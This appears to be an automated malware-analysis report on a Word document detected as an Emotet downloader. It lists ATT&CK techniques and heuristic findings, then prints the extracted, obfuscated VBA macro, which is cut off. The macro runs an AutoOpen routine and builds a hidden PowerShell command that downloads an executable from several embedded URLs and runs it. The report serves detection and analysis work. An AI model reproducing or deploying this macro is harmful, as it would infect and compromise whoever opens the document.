Verdict: MALICIOUS
Risk Score: 202

Malware Insights

MITRE ATT&CK
- T1059.005 Visual Basic
- T1204.002 Malicious File
- T1105 Ingress Tool Transfer
The sample contains a VBA macro with an AutoOpen subroutine that calls the Shell() function. This is a common technique used by Emotet to download and execute a second-stage payload. The ClamAV detection name also explicitly identifies it as an Emotet downloader.
Heuristics (6)
- ClamAV: Doc.Downloader.Emotet-6883983-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Emotet-6883983-0
- VBA macros detected (medium, OLE_VBA_MACROS, 2 related findings): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5270 bytes |

SHA-256 of macros.bas: f9ac4e9586ad679239c43c0d5b11ff56128a0f1cb656c8800ddfc6ea4ac80c2f
Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "FFZfwUfC"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On _
Error _
Resume _
Next
Set SmDUA = pZtAs
Set DDIUar = fzITY
Set KIbsbi = QzIAiK
Set JFJdMV = jNjYPf
Set ikwjA = Qqldor
Set IDPPz = qNfpuE
Set PcTiAj = bDonu
Shell MDlrjZDsFf + hWmdGiqhda + BIfUnzT + fjnCwifzqTt + zabEcVivtNEt, Format(0)
Set qquJT = zXHAr
Set wkGNGU = qKBjOr
End Sub
Attribute VB_Name = "mTjJiIoIvJam"
Function MDlrjZDsFf()
On _
Error _
Resume _
Next
Set rHHHF = jiCIc
Set tcKzCq = zFvDk
kIicVDzA = Format(Chr(13 + 10 + 5 + 4 + 67)) + "md /V" + "^" + ":^ON" + "/" + Format(Chr(8 + 7 + 3 + 3 + 46)) + Format(Chr(4 + 3 + 1 + 1 + 25)) + "^" + "s" + "^et I^" + "5" + "=^ "
Set dcaak = XwJLv
Set EWsYT = nusvm
Set AuWNkw = Edzkr
Set QPOjR = CQhUcQ
Set hwuYSj = PUrWhA
kfStBqcR = "^ ^ ^" + " ^ " + "^ " + "^ " + "^ " + " ^" + " ^ ^ " + " ^}" + "^}{" + "^"
Set qjjTdw = iPzNO
Set CBdjsU = rQvzwN
Set KwjlNs = fLpaH
pGdWMXSIi = "h" + Format(Chr(13 + 10 + 5 + 4 + 67)) + "t^" + "a" + Format(Chr(13 + 10 + 5 + 4 + 67)) + "^}^" + ";^ka" + "^" + "erb^;" + "^Qj^B$^" + " ^" + "m^etI-" + "^ekovn"
Set jYwpSM = qXPRs
Set mwDri = nKSVBi
Set qRMmM = MQikQn
ikkBvunMZ = "^I" + "^;" + ")^QjB$" + " ^,v^q" + "D^$(^e" + "^" + "l^i" + "^Fd^ao^" + "ln^wo^" + "D.^fQ" + "T^" + "$^{yr^t"
Set zbSlQ = hAcrf
tlzEpdBLiET = "^{" + ")O" + "r^H^" + "$" + " " + "ni"
Set wmGBW = oWiwt
Set SauKG = tXMLJu
Set zUTWnC = IzBLIw
rchVAjjznIQ = "^ vqD" + "^$(^" + "h" + Format(Chr(13 + 10 + 5 + 4 + 67)) + "^a" + "^er^o^f" + ";'exe" + ".^'+" + "jIa^$" + "+'\^'"
MDlrjZDsFf = kIicVDzA + kfStBqcR + pGdWMXSIi + ikkBvunMZ + tlzEpdBLiET + rchVAjjznIQ
Set Iwlath = uqZpj
Set GcWYn = HXISU
Set dtwwj = BOYDs
End Function
Function hWmdGiqhda()
On _
Error _
Resume _
Next
Set adohk = LdjzNz
Set iZdvz = JliYmj
pswZR = "^+" + Format(Chr(13 + 10 + 5 + 4 + 67)) + "^i" + "^" + "lb^u^p" + "^:vn" + "^e^$" + "^=" + "^Q"
Set IPVAm = uPKtvw
Set cjhht = ALnNZ
DLiEGjPuzqn = "^j^B$^;" + "^'50^2^" + "' " + "=^ j^I" + "a^$^;)'" + "^@^" + "'"
Set jvhVqs = MbQFoX
Set cHahwz = QpRXMb
Set HvodG = XEOnKC
Set PuDiZI = iswmMn
Set CBwoj = sEwWd
YEwljRVQD = "(^tilp" + "^S" + "^" + ".^'" + Format(Chr(13 + 10 + 5 + 4 + 67)) + "S" + "^"
Set fpXcBo = cRTCSo
Set cIMFVC = HiErvw
Set LcajKb = wnBLq
unANrDmkSbw = "qD" + "f^X" + "w7/^" + "k^p^.sp" + "^ir^t^0" + "^63/" + "/^:p^t" + "th@^"
Set GjsnM = ZLmCz
Set qYoVc = bdZzFJ
Set KLWZw = UTzcv
RidhaS = "iD^" + "kt" + "^A^" + "X^X/" + "nv"
Set zpwYAP = oLqYMZ
Set rXJYTB = bQvtI
Set VqqDEW = hWvKJS
Set tCCin = OJrvO
Set uXbLZ = XUzhLs
tbfhkbn = "^" + "." + "t^en" + ".im" + "^i"
Set RObXH = msTUDM
Set GbHfv = DEaZK
Imctj = "kit" + "//" + ":" + "^p^t^" + "t^" + "h@^"
Set pGMhfY = wwVok
LMzGwJ = "Zu^" + "HDp" + "^" + "pt^MA/" + "^mo" + Format(Chr(13 + 10 + 5 + 4 + 67)) + "^.^st" + "n^" + "iapr^a" + "g" + "^as/" + "/:pt" + "^th" + "^"
Set kTaPWo = CnLaOM
Set MALJD = HVjts
nWsjtjTGmL = "@" + "f^YVzv^" + "G0^t/^m" + "^o" + Format(Chr(13 + 10 + 5 + 4 + 67)) + "^.^" + "oi^d^" + "em^ero^" + "d^a^lu" + "b//:^"
hWmdGiqhda = pswZR + DLiEGjPuzqn + YEwljRVQD + unANrDmkSbw + RidhaS + tbfhkbn + Imctj + LMzGwJ + nWsjtjTGmL
Set rLBFUq = ksDoF
End Function
Function BIfUnzT()
On _
Error _
Resume _
Next
Set IUzJj = ckzzjc
Set EJuKw = oYuuW
Set tVdjGQ = AZJszv
hqEtzWniVLl = "p^tt^" + "h@fm" + "^w^eR^" + "g^X" + "^f" + Format(Chr(8 + 7 + 3 + 3 + 46)) + "/^" + "mo" + Format(Chr(13 + 10 + 5 + 4 + 67)) + "^" + ".gn^ah" + "^hn^" + "i" + "h" + Format(Chr(13 + 10 + 5 + 4 + 67)) + "m^" + "3"
Set LzNHr = ZIznc
Set ACMBjj = ZzNtA
STOCImzoN = "//" + ":p^t^" + "t^h'=" + "^Or" + "^" + "H" + "$;^tn" + "^eil" + Format(Chr(8 + 7 + 3 + 3 + 46)) + "b^" + "e^W." + "teN"
... (truncated)